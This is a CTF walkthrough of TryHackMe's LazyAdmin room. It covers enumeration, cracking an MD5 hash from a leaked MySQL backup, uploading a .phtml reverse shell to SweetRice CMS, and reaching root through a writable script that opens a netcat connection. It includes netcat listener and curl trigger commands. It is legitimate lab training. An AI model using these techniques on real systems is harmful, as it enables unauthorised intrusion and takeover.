LazyAdmin — TryHackMe Walkthrough
Hello Everyone! Today I’ll be doing LazyAdmin room on TryHackMe.
Room Link: https://tryhackme.com/r/room/lazyadmin
Let’s get started!
First, we shall add our IP to /etc/hosts
.
Step 0: Reconnaissance
We’ll use Nmap(Network Mapper) to enumerate the open ports and services running on the target machine.
sudo nmap -sC -sV -oN logs/initial_nmap admin.ctf
- -sC — to run the default set of script scans for a target host.
- -sV — to enable version detection for target host.
- -oN — to save the output in normal format.
Brief
- 22/tcp — SSH(Secure Shell) — used for secure remote access to systems, we must find a username and password of ssh to get access of the target machine.
- 80/tcp — HTTP server — running an Apache 2.4.18 web server.
Step 1: Web Discovery
Lets inspect the web server running on port 80.
Its the default Apache page, gotta check robots.txt
for any entries.
No luck! Need to check hidden directories on the web server. We’ll use gobuster
for this task.
gobuster dir -u http://admin.ctf/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt
There’s a /content
directory, lets check it.
Its a SweetRice CMS site. We must enumerate this directory more to find something juicy.
gobuster dir -u http://admin.ctf/content -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt
The /inc
entry looks interesting.
Bingo! Its an index of the application.
We got a mysql backup file. Lets check for credentials inside it.
We got the username(manager) and password hash. Lets crack it.
Its a MD5 hash. We’ll use JohnTheRipper with rockyou.txt
as our wordlist to crack the password.
john --format=raw-md5 hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Easy catch! Now let’s login to the cms dashboard.
admin.ctf/content/as
Step 2: Getting the shell
Now that we have the access of the CMS we can upload our php reverse shell and get access of the system.
It seems like we can’t upload files with .php
extension. Lets bypass this by changing our file extension to .phtml
.
And it works!
Let’s start a netcat
listener on our attack machine and send a request to the uploaded file using curl
to get the reverse shell.
On attack machine:
nc -nlvp 9001
Open a new terminal and send a request to the revshell.php
.
curl http://admin.ctf/content/attachment/revshell.phtml
Bullseye!
Inside /home/itguy
I found the first flag user.txt
Step 3: Privilege Escalation
Let us escalate our privileges to grab the root flag. Using sudo -l
command we can check what commands can be executed as root.
We may execute the backup.pl
script with root privileges. Lets abuse this configuration.
Weird! the perl script executes another script(copy.sh).
The copy.sh
script just makes a request to an IP address using netcat and luckily we have the write access to this file. We can exploit this by starting another netcat
listener on port 5554 and then changing the IP inside copy.sh
to our IP.
When backup.pl
will be executed with root privileges it will get us a root shell on our 2nd netcat
listener.
On 1st netcat shell:
On 2nd netcat shell:
And the machine has been successfully pwned!
Conclusion
LazyAdmin is an easy-rated room which requires knowledge of basic target enumeration, website enumeration, hash cracking, file upload bypass etc.
Its requires intermediate-level pentesting skills to crack this room.